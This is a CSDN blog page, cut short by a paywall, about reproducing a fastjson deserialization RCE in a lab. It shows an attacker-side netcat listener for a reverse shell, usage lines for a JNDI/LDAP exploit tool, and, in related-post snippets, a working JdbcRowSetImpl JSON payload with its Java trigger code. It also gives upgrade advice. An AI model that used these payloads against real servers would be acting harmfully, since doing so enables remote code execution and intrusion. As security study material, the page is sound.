35-4 fastjson漏洞复现

已于 2024-04-12 20:31:32 修改
阅读量155 收藏
点赞数
分类专栏: Web安全攻防全解析 文章标签: 安全
于 2024-04-11 21:45:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263566/article/details/137649848
版权
本文介绍了如何复现fastjson的安全漏洞,包括在Kali攻击机上开启nc监听,利用fastjson_tool.jar启动LDAP服务器,并通过payload反弹shell。同时,提供了两种修复建议,包括升级到fastjson 1.2.83版本及以上,以及考虑使用Fastjson v2以获取更好的性能和安全性。
摘要由CSDN通过智能技术生成

 环境准备:35-2 fastjson反序列化漏洞介绍 及漏洞环境搭建-CSDN博客 

fastjson_tool.jar下载:fastjson_rce_tool: fastjson命令执行自动化利用工具, remote code execute,JNDI服务利用工具 RMI/LDAP (gitee.com)

一、攻击机kali开启nc监听6666端口(或其他端口也行,只要不重复就行)

nc -lvvp 6666

具体解释如下:

  • nc: 是 netcat 工具的命令行名称,用于网络连接。
  • -l: 表示监听模式,告诉 netcat 在指定的端口上监听连接。
了解本专栏 订阅专栏 解锁全文 超级会员免费看
狗蛋的博客之旅
关注
专栏目录
订阅专栏
用友 GRP-U8 fastjson远程代码执行漏洞复现(XVE-2024-8863)
0xSec
04-24 807
用友 GRP-U8 R10系列版本 VerifyToken 接口存在低版本fastjson反序列化漏洞,未经身份验证的攻击者可利用此漏洞获取服务器权限。
Fastjson历史漏洞复现
懂进攻知防守
07-27 1440
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
Fastjson 1.83漏洞利用猜想
王嘟嘟的博客
02-12 999
感觉这次有点老洞新用的意思,以上为猜测的一种可能性,目前未找到可用的调用链。能早点不用fastjson就不用尽早给低版本出具完全修复补丁,避免之后的各种漏洞影响,当然前提是不影响功能。以上。
复现fastjson反序化漏洞(fastjson1.2.80)
TVT111的博客
07-21 2969
文章利用JNDI-Injection-Exploit工具,主要讲解如何利用JNDI注入复现fastjson反序化漏洞
Fastjson1.2.83 任意代码执行漏洞(CVE-2022-25845)
北方的孤夜
12-14 4169
如何开启 fastjson safemode
fastjson1.2.83反序列化漏洞
Coder的博客
07-13 8093
【代码】fastjson1.2.83反序列化漏洞
FastJson中AutoType反序列化漏洞
isxiaole的博客
05-06 8732
FastJson中AutoType反序列漏洞梳理。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6376
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
fastjson框架漏洞复现
没有
10-23 2355
fastjson是阿里巴巴开源的json解析库,通常被用于java object和json字符之间进行转换,提供两个方法json.tojsonstring和json.parseobject/json.parse来分别实现序列化与反序列化。
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
fastJson_jar包 1.2.57最新版本
04-21
Fastjson is a Java library that can be used to convert Java Objects into their JSON representation. It can also be used to convert a JSON string to an equivalent Java object. Fastjson can work with arbitrary Java objects including pre-existing objects that you do not have source-code of.
fastjson最新版本jar包
07-21
fastjson最新版本jar包 fastjson-1.2.14.jar
fastjson各版本jar包以及使用方法
07-19
https://blog.csdn.net/hykwhjc/article/details/81121224 fastJSON的使用
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
weixin_45260839的博客
08-12 779
CNVD-2019-22238 Fastjson 1.2.47 反序列化复现
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
最新发布
2301_79837041的博客
04-11 2477
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
FastJson漏洞工具
dahe
06-15 5105
有的时候,我们在渗透ceshi 1.下载地址 https://github.com/nex121/FastjsonEXP
Fastjson反序列化漏洞
yyj1781572的博客
04-13 2039
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
vulhub靶场训练-fastjson漏洞
m0_67284865的博客
08-16 305
(51条消息) 关于fastjson 漏洞原理分析_fastjson漏洞原理_life1024的博客-CSDN博客Fastjson 是一个Java 库,可以将Java 对象转换为 JSON 格式,当然它也可以将]SON 字符申转换为Java 对象Fastjson 可以操作任何Java 对象,即使是一些预先存在的没有源码的对象。
fastjson漏洞复现
09-11
Fastjson 是一个针对Java对象和JSON数据进行转换的Java类库,但是在处理JSON字符串时存在一些安全漏洞。其中最常见的是反序列化漏洞,攻击者可以通过构造恶意的JSON字符串来执行任意代码。下面是一个简单的Fastjson反序列化漏洞复现过程: 1. 下载 Fastjson 的 jar 包,将其加入项目的 classpath 中。 2. 构造一个恶意的 JSON 字符串,例如: ```json {"@type":"java.lang.AutoCloseable","@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} ``` 3. 使用 Fastjson 将 JSON 字符串反序列化为 Java 对象,并执行其中的代码: ```java String json = "{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\",\"autoCommit\":true}"; Object obj = JSON.parse(json); ``` 这段代码会将 JSON 字符串反序列化为一个 Java 对象,并执行其中的任意代码,包括远程代码执行等恶意行为。 需要注意的是,Fastjson 的反序列化漏洞并不是固定的,具体的漏洞形式与使用的 Fastjson 版本有关。因此,在使用 Fastjson 时,需要及时更新到最新版本以避免安全漏洞。同时,不要在应用程序中接受来自用户输入的 JSON 数据,以免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狗蛋的博客之旅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值